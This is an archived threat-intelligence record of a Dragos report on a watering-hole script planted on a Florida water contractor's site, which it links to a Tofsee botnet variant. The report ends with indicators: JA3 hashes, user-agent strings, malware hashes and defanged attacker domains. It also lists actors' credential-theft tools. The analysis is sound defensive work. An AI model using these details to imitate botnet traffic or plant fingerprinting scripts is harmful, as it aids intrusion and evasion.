{ "id": "dcda1958-9761-485f-8d9b-471e27756968", "created_at": "2026-04-06T00:18:57.279514Z", "updated_at": "2026-04-10T03:36:24.726615Z", "deleted_at": null, "sha1_hash": "12ed6b0f9f53ad3cd0edbb8ccfa3d3e68a6dca5e", "title": "When Intrusions Don't Align: A New Water Watering Hole and Oldsmar", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4126372, "plain_text": "When Intrusions Don't Align: A New Water Watering Hole and\r\nOldsmar\r\nBy Dragos, Inc.\r\nPublished: 2021-05-18 · Archived: 2026-04-05 18:22:16 UTC\r\nMembers of the cybersecurity community at large know that learning opportunities present themselves every day.\r\nThe purpose behind this investigative anecdote on the “water watering hole” is educational and highlights how\r\nsometimes two intrusions just don’t line up together no matter how much coincidence there is. We hope you will\r\nagree after reading this that intelligence and intrusion analysis are not always what they seem.\r\nOur story begins in Oldsmar, Florida, on Monday, 08 February 2021, when the Pinellas County Sheriff held a\r\npress conference. The sheriff, Oldsmar mayor, and city manager described a water poisoning attempt at the city’s\r\nwater treatment plant the previous Friday. This unprecedented event made both a stir in the media and among\r\nDragos’s team of adversary hunters.\r\nA Water Watering Hole Is Discovered\r\nDuring our investigation into the infamous water poisoning attempt against the citizens of Oldsmar, Dragos\r\ndiscovered a Florida water utility contractor hosting malicious code on their website (i.e., a watering hole). This\r\nmalicious code seemingly targeted water utilities, particularly in Florida, and more importantly, was visited by a\r\nbrowser from the city of Oldsmar on the same day of the poisoning event.\r\nFigure 1: Website compromised with a unique browser enumeration and fingerprinting script\r\nThe adversary inserted the malicious code into the footer file (Figure 2) of the WordPress-based site associated\r\nwith a Florida water infrastructure construction company. The adversary possibly exploited one of the multiple\r\nvulnerable WordPress plugins that Dragos determined were in use on the site at the time of compromise.\r\nhttps://www.dragos.com/blog/industry-news/a-new-water-watering-hole/\r\nPage 1 of 6\n\nFigure 2: Location of the subverted code in the footer of the once compromised WordPress site\r\nxxxxxxxxxxxxxx[.]com\r\nA Snapshot of the Malicious Data Gathering Campaign\r\nThis malicious data gathering campaign affected computer systems that browsed the compromised, but otherwise\r\nlegitimate, website during a 58-day window beginning 20 December 2020. Dragos assisted with malicious code\r\nidentification and initial remediation of the compromised website on 16 February 2021. Those who interacted with\r\nthe malicious code included computers from municipal water utility customers, state and local government\r\nagencies, various water industry-related private companies, and normal internet bot and website crawler traffic.\r\nOver 1000 end-user computers were profiled by the malicious code during that time, mostly from within the\r\nUnited States and the State of Florida, as shown in Figure 3.\r\nFigure 3: Geolocation of US fingerprinted client computers\r\nUsing telemetry from Team Cymru Pure Signal Recon, Dragos determined that a user on a computer system on a\r\nnetwork belonging to the City of Oldsmar browsed the compromised site at exactly 14:49 Coordinated Universal\r\nTime (UTC), or 9:49 am on 05 February 2021. This is the same network where an unknown actor reportedly\r\nhttps://www.dragos.com/blog/industry-news/a-new-water-watering-hole/\r\nPage 2 of 6\n\ncompromised a water treatment control plant computer on the morning of 05 February and attempted to poison the\r\nwater supply using the computer system’s Human Machine Interface (HMI).\r\nBased on these initial facts Dragos released an Advisory Alert on 17 February 2021 to customers informing them\r\nof the watering hole potentially targeting water utilities along with defensive guidance and indicators. The purpose\r\nof an Advisory Alert is to ensure customers receive and can act on timely intelligence when the entire story is not\r\nyet known. We also shared our insights with our partners at the Department of Homeland Security (DHS) so they\r\ncould perform victim notifications if they deemed it important.\r\nAfter the Advisory Alert Dragos went to work uncovering and exposing the entire threat.\r\nDeciphering the Malicious Fingerprinting Script\r\nDragos reverse-engineered the fingerprinting script and determined it used code from four different code projects:\r\ncore-js, UAParser, regeneratorRuntime, and a data collection script only observed elsewhere on two websites\r\n(script example) associated with a domain registration, hosting, and web development company.\r\nThe fingerprinting script gathered over 100 elements of detailed information about the visitors including the\r\nfollowing:\r\nOperating system and CPU\r\nBrowser, including available languages\r\nTouch points, input methods, presence of camera, accelerometer, microphone\r\nVideo card display adapter details, and\r\nTime zone, geolocation, video codecs, screen dimensions, browser plugins\r\nThe script also directed the visiting browser to two separate browser cipher fingerprinting sites to collect cipher\r\nfingerprint hashes: TLS fingerprint, JA SSL Fingerprint. Various network defense regimes typically compute\r\nbrowser cipher fingerprinting such as JA3 (done by ja3er[.]com, for example) to detect connections from\r\nmalware-infected hosts and discern hostile connections from legitimate browser client traffic. Once all this data\r\nwas collected in the browser memory, the JavaScript code sent the data via Hypertext Transfer Protocol (HTTP)\r\nPOSTs to a database on the same Heroku app site that hosted the script, bdatac.herokuapp[.]com. This Heroku app\r\nwas taken down after notification from Dragos.\r\nDragos found exactly one other internet site that hosted this complex code and served it to visiting internet\r\nbrowsers, DarkTeam Store. DarkTeam Store claims to be a dark market that supplies thousands of customers with\r\ngift cards and accounts (Figure 4).\r\nhttps://www.dragos.com/blog/industry-news/a-new-water-watering-hole/\r\nPage 3 of 6\n\nFigure 4: Browser enumeration and fingerprinting script on purported dark market site\r\ndarkteam.store\r\nAdditional analysis of data obtained by Dragos revealed that at least a portion of this site may not actually be a\r\ndark market, but rather a check-in place for systems infected with a recent variant of botnet malware known as\r\nTofsee. Dragos found evidence showing that the DarkTeam store and the water infrastructure construction\r\ncompany website were subverted by the same actor on the same day (20 December 2020). Dragos observed\r\n12,735 IP addresses representing likely Tofsee-infected systems worldwide employing 271 unique user agents.\r\nThese clients connected to a non-public (i.e., requiring authentication) page (httpx://darkteam[.]store/dogs/Home-2.html) of the DarkTeam site and presented a browser user agent string with a peculiar “Tesseract/1.0” artifact\r\n(Figure 5).\r\nFigure 5: Unique “Tesseract/1.0” user agent substring artifact associated with browser check-ins to\r\nrestricted page on darkteam.store site\r\nImproving Botnets to Impersonate Legitimate Browser Activity\r\nhttps://www.dragos.com/blog/industry-news/a-new-water-watering-hole/\r\nPage 4 of 6\n\nThis bot check-in routine for JA3 cipher fingerprinting may be the Tofsee malware author’s response to network\r\ndefense techniques used to detect previous iterations of Tofsee botnet malware with a characteristic JA3 hash.\r\nDragos performed forensic log analysis and identified three JA3 hashes unique to this new Tofsee botnet that\r\nDragos calls “Tesseract.” Dragos also obtained other JA3 hashes from an industry partner that observed\r\nconnections from this botnet. Some of these JA3 hashes are also associated with legitimate browsers. Dragos\r\nfocuses solely on ICS cybersecurity, but as we obtain detailed intelligence on this threat from our investigation,\r\nwe share indicators to facilitate botnet detection.\r\nWith the forensic information we collected so far, Dragos’s best assessment is that an actor deployed the watering\r\nhole on the water infrastructure construction company site to collect legitimate browser data for the purpose of\r\nimproving the botnet malware’s ability to impersonate legitimate web browser activity. The botnet’s use of at least\r\nten different cipher handshakes or JA3 hashes, some of which mimic legitimate browsers, compared to the widely\r\npublished hash of a single handshake of a previous Tofsee bot iteration is evidence of botnet improvement.\r\nIn Summary\r\nWe do not understand why the adversary chose this specific Florida water construction company site to\r\ncompromise and to host their code. Interestingly, and unlike other watering hole attacks, the code did not deliver\r\nexploits or attempt to achieve access to victim computers. It is possible the actor believed that the water\r\ninfrastructure construction website would allow more dwell time to collect data important for the actor’s\r\nobjectives, than perhaps a busier but more closely monitored website with a dedicated security team.\r\nSeveral elements early in our investigation suggested a highly potent and dangerous threat to water utilities:\r\nFlorida-focused watering hole\r\nTemporal correlation to Oldsmar event\r\nHighly encoded and sophisticated JavaScript\r\nFew code locations on the internet\r\nKnown ICS-targeting activity groups use watering holes as initial access including: DYMALLOY,\r\nALLANITE, and RASPITE\r\nFurther investigation revealed a less ominous threat but provided an excellent lesson in alerting the industry early\r\nto potential threats while continuing the investigation until the full scope and intent of the events can be\r\nunderstood.\r\nThis is not a typical watering hole. We have medium confidence it did not directly compromise any organization.\r\nBut it does represent an exposure risk to the water industry and highlights the importance of controlling access to\r\nuntrusted websites, especially for Operational Technology (OT) and Industrial Control System (ICS)\r\nenvironments.\r\nIndicators\r\n“Tesseract” variant of the Tofsee botnet malware indicators:\r\nJA3 Hashes\r\nhttps://www.dragos.com/blog/industry-news/a-new-water-watering-hole/\r\nPage 5 of 6\n\n5732cd1c2c85c7548ef840e05f42feec\r\n45728c30345dddda40cd01ee2f7a4c8e\r\n9f681ac5cde4d035b5d3dc040bda1a34\r\nUser-agent substring artifact\r\nUser agent examples\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64; Tesseract/1.0) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/80.0.3987.163 Safari/537.36\r\nMozilla/5.0 (Android 10; Mobile; rv:84.0; Tesseract/1.0) Gecko/84.0 Firefox/84.0\r\nMozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X; Tesseract/1.0) AppleWebKit/605.1.15 (KHTML,\r\nlike Gecko) Version/14.0.2 Mobile/15E148 Safari/604.\r\nMozilla/5.0 (Windows NT 6.1; Tesseract/1.0) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/88.0.4324.104 Safari/537.36\r\nMozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0; Tesseract/1.0) Gecko/20100101 Firefox/84.0 (count: 68,\r\nlast seen: 2021-02-18 17:32:12)\r\nMozilla/5.0 (Linux; Android 10; Redmi Note 9S; Tesseract/1.0) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/88.0.4324.152 Mobile Safari/537\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64; Tesseract/1.0) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/75.0.3770.142 Safari/537.36\r\nMozilla/5.0 (Linux; Android 10; Redmi Note 8; Tesseract/1.0) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/87.0.4280.101 Mobile Safari/537.36\r\nTofsee botnet malware SHA256\r\n6ce6c04ffb7f0ac158c0e340b52d2ebdb48fd089bd24c6fdbf81947bce0e476d\r\n2701f35430167bbb99f334c81088af75f8209a07cb1bcbf9c765a4968af2fbaa\r\nSource: https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/\r\nhttps://www.dragos.com/blog/industry-news/a-new-water-watering-hole/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/" ], "report_names": [ "a-new-water-watering-hole" ], "threat_actors": [ { "id": "81d49904-579d-45b3-ace2-1fdf0a713bc4", "created_at": "2022-10-25T15:50:23.331457Z", "updated_at": "2026-04-10T02:00:05.291098Z", "deleted_at": null, "main_name": "Leafminer", "aliases": [ "Leafminer", "Raspite" ], "source_name": "MITRE:Leafminer", "tools": [ "LaZagne", "Mimikatz", "MailSniper", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "552eeef7-4a19-44de-9147-db8893c115ef", "created_at": "2023-01-06T13:46:38.598788Z", "updated_at": "2026-04-10T02:00:03.034846Z", "deleted_at": null, "main_name": "RASPITE", "aliases": [ "LeafMiner", "Raspite" ], "source_name": "MISPGALAXY:RASPITE", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "649b5b3e-b16e-44db-91bc-ae80b825050e", "created_at": "2022-10-25T15:50:23.290412Z", "updated_at": "2026-04-10T02:00:05.257022Z", "deleted_at": null, "main_name": "Dragonfly", "aliases": [ "TEMP.Isotope", "DYMALLOY", "Berserk Bear", "TG-4192", "Crouching Yeti", "IRON LIBERTY", "Energetic Bear", "Ghost Blizzard" ], "source_name": "MITRE:Dragonfly", "tools": [ "MCMD", "Impacket", "CrackMapExec", "Backdoor.Oldrea", "Mimikatz", "PsExec", "Trojan.Karagany", "netsh" ], "source_id": "MITRE", "reports": null }, { "id": "a792743d-78a4-40c9-9d9a-a12c52880297", "created_at": "2023-01-06T13:46:38.75457Z", "updated_at": "2026-04-10T02:00:03.089271Z", "deleted_at": null, "main_name": "ALLANITE", "aliases": [ "Palmetto Fusion", "Allanite" ], "source_name": "MISPGALAXY:ALLANITE", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "90307967-d5eb-4b7b-b8de-6fa2089a176e", "created_at": "2022-10-25T15:50:23.501119Z", "updated_at": "2026-04-10T02:00:05.347826Z", "deleted_at": null, "main_name": "Dragonfly 2.0", "aliases": [ "Dragonfly 2.0", "IRON LIBERTY", "DYMALLOY", "Berserk Bear" ], "source_name": "MITRE:Dragonfly 2.0", "tools": [ "netsh", "Impacket", "MCMD", "CrackMapExec", "Trojan.Karagany", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "1a76ed30-4daf-4817-98ae-87c667364464", "created_at": "2022-10-25T16:47:55.891029Z", "updated_at": "2026-04-10T02:00:03.646466Z", "deleted_at": null, "main_name": "IRON LIBERTY", "aliases": [ "ALLANITE ", "ATK6 ", "BROMINE ", "CASTLE ", "Crouching Yeti ", "DYMALLOY ", "Dragonfly ", "Energetic Bear / Berserk Bear ", "Ghost Blizzard ", "TEMP.Isotope ", "TG-4192 " ], "source_name": "Secureworks:IRON LIBERTY", "tools": [ "ClientX", "Ddex Loader", "Havex", "Karagany", "Loek", "MCMD", "Sysmain", "xfrost" ], "source_id": "Secureworks", "reports": null }, { "id": "0a0132a3-526d-4698-be49-5e75530c1417", "created_at": "2022-10-25T15:50:23.856139Z", "updated_at": "2026-04-10T02:00:05.42054Z", "deleted_at": null, "main_name": "ALLANITE", "aliases": [ "ALLANITE", "Palmetto Fusion" ], "source_name": "MITRE:ALLANITE", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "1c4281e9-0a4c-4f20-94a2-25ed3661cc98", "created_at": "2022-10-25T16:07:23.301826Z", "updated_at": "2026-04-10T02:00:04.529332Z", "deleted_at": null, "main_name": "Allanite", "aliases": [ "G1000", "Palmetto Fusion" ], "source_name": "ETDA:Allanite", "tools": [ "PsExec", "SecreetsDump", "THC Hydra" ], "source_id": "ETDA", "reports": null }, { "id": "5cbf6c32-482d-4cd2-9d11-0d9311acdc28", "created_at": "2023-01-06T13:46:38.39927Z", "updated_at": "2026-04-10T02:00:02.958273Z", "deleted_at": null, "main_name": "ENERGETIC BEAR", "aliases": [ "BERSERK BEAR", "ALLANITE", "Group 24", "Koala Team", "G0035", "ATK6", "ITG15", "DYMALLOY", "TG-4192", "Crouching Yeti", "Havex", "IRON LIBERTY", "Blue Kraken", "Ghost Blizzard" ], "source_name": "MISPGALAXY:ENERGETIC BEAR", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32c8c1a1-ae5c-4a05-a95d-2e970a46cd1e", "created_at": "2022-10-25T16:07:23.777999Z", "updated_at": "2026-04-10T02:00:04.747552Z", "deleted_at": null, "main_name": "Leafminer", "aliases": [ "Flash Kitten", "G0077", "Leafminer", "Raspite" ], "source_name": "ETDA:Leafminer", "tools": [ "Imecab", "LaZagne", "Mimikatz", "PhpSpy", "Sorgu" ], "source_id": "ETDA", "reports": null }, { "id": "e2a4bc0b-6745-4e55-9d7c-3d169d70b025", "created_at": "2022-10-25T16:07:23.386907Z", "updated_at": "2026-04-10T02:00:04.576815Z", "deleted_at": null, "main_name": "Berserk Bear", "aliases": [ "Berserk Bear", "Dragonfly 2.0", "Dymalloy", "G0074" ], "source_name": "ETDA:Berserk Bear", "tools": [ "Fuerboos", "Goodor", "Impacket", "Karagany", "Karagny", "LOLBAS", "LOLBins", "Living off the Land", "Phishery", "Trojan.Karagany", "Trojan.Phisherly", "xFrost" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434737, "ts_updated_at": 1775792184, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/12ed6b0f9f53ad3cd0edbb8ccfa3d3e68a6dca5e.pdf", "text": "https://archive.orkl.eu/12ed6b0f9f53ad3cd0edbb8ccfa3d3e68a6dca5e.txt", "img": "https://archive.orkl.eu/12ed6b0f9f53ad3cd0edbb8ccfa3d3e68a6dca5e.jpg" } }